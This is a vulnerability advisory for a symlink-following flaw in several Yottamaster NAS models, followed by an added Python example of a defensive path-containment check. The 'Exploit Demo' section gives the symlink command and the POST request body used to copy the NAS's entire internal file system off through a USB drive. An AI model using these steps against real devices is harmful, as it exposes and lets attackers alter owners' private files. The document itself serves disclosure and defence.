Information

Vendor: Yottamaster

Affected Products:

Vendor Homepage: https://yottamaster.com/

Vendor Contact Information: supports@yottamaster.com

Description

A vulnerability exists in multiple Yottamaster NAS devices, including DM2 (version equal to or prior to V1.9.12), DM3 (version equal to or prior to V1.9.12), and DM200 (version equal to or prior to V1.2.23), that attackers could exploit to leak or tamper with the internal file system. The vulnerability stems from lax checks on symbolic links on external USB devices. An attacker can create a symlink to the root directory on a USB drive, insert the drive into the NAS device's slot, and then access the symlink directory on the USB drive mounted on the NAS to obtain all files within the NAS system and tamper with those files.

Exploit Demo

Format the USB drive as ext4, then create a symbolic link on it that points to the root directory, for example: sudo ln -s / rootdir

Then insert the USB flash drive into the external USB slot of the NAS device. An attacker can send the following POST request to the /file interface on port 9898 of the NAS and export the entire internal file system of the NAS through the symbolic link on the USB drive.

{
  "session": "HS_clo41CDBJEgM4VEafG0QK4GggLDrp6",
  "method": "manage",
  "params": {
    "action": 0,
    "des_path_type": 2,
    "todir": "/",
    "cmd": "copy",
    "path": [
      "/sdc1/rootdir/***"
    ],
    "share_path_type": 7,
    "to_groupid": 0
  }
}

Finally, we can see that the entire file system directory inside the NAS has been exported.
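
One way to implement the symlink check whose absence the Description names, shown here as an added example that is not Yottamaster's code or part of the original advisory. The function names and the temporary directory standing in for the mounted USB volume are assumptions; the sample volume is constructed.

```python
import os
import tempfile

class PathEscape(Exception):
    """Raised when a path resolves outside the volume it was addressed through."""

def resolve_within_volume(volume_root, requested):
    """Resolve a volume-relative path and require the result to stay under volume_root."""
    root = os.path.realpath(volume_root)
    # lstrip so "/rootdir/etc" is joined under the volume instead of replacing it
    target = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        raise PathEscape(f"{requested!r} resolves to {target!r}, outside {root!r}")
    return target

def find_escaping_symlinks(volume_root):
    """Walk a freshly mounted volume and list symlinks whose targets leave it."""
    root = os.path.realpath(volume_root)
    escaping = []
    # followlinks=False: symlinked directories are listed but never descended into
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                target = os.path.realpath(full)
                if os.path.commonpath([root, target]) != root:
                    escaping.append((os.path.relpath(full, root), target))
    return sorted(escaping)

def build_sample_volume():
    """Constructed stand-in for the mounted USB volume (the page's /sdc1)."""
    vol = tempfile.mkdtemp(prefix="usbvol_")
    os.mkdir(os.path.join(vol, "photos"))
    with open(os.path.join(vol, "photos", "a.txt"), "w") as fh:
        fh.write("ok")
    os.symlink("/", os.path.join(vol, "rootdir"))    # the link described on the page
    os.symlink("photos", os.path.join(vol, "pics"))  # benign link, stays inside
    return vol

if __name__ == "__main__":
    vol = build_sample_volume()
    print("escaping links:", find_escaping_symlinks(vol))
    print("allowed:", resolve_within_volume(vol, "/pics/a.txt"))
    try:
        resolve_within_volume(vol, "/rootdir/etc")
    except PathEscape as exc:
        print("rejected:", exc)
```

A resolve-then-open check like this can be raced if the volume is writable while the request runs, so the same containment should also be enforced at open time, for example with openat2 and RESOLVE_BENEATH on Linux 5.6 or later.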

Credit